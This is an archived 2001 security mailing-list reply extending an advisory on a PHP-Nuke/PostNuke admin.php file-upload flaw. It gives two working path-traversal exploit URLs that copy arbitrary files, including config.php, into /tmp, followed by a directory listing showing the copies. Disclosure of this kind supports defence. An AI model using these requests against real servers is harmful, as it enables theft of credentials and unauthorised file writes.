Re: twlc advisory: all versions of php nuke are vulnerable...

From: Paul Starzetz (paulat_private)
Date: Tue Sep 25 2001 - 04:40:37 PDT

Next message: Raistlin: "Re: Regarding: 3Com OfficeConnect 812/840 Router DoS exploit code"

Previous message: Magnus Skjegstad: "Re: twlc advisory: all versions of php nuke are vulnerable..."
In reply to: supergateat_private: "twlc advisory: all versions of php nuke are vulnerable..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

supergateat_private wrote:

> Summary
> This time the bug is really dangerous...it allows you to 'cp' any file on
> the box... or even upload files...

and even copy outside the postnuke path:

http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt

or for example:

http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&userfile=/../../../../../../../tmp/copyme.txt&userfile_name=/../../../../../../../tmp/hacked.txt

root@somehost:/tmp > ls -la
total 20
drwxrwxrwt   8 root     root         2048 Sep 25 13:37 .
drwxr-xr-x  19 root     root         2048 Feb 28  2001 ..
drwxrwxrwt   2 root     root         2048 Mar  6  2001 .X11-unix
-rw-r--r--   1 root     root          851 Sep 25 13:37 copyme.txt
-rwxr-xr-x   1 wwwrun   wwwrun        851 Sep 25 13:37 hacked.txt
...

Postnuke breaks with elemntary secure coding practices...

/ihq

Next message: Raistlin: "Re: Regarding: 3Com OfficeConnect 812/840 Router DoS exploit code"
Previous message: Magnus Skjegstad: "Re: twlc advisory: all versions of php nuke are vulnerable..."
In reply to: supergateat_private: "twlc advisory: all versions of php nuke are vulnerable..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 25 2001 - 10:27:00 PDT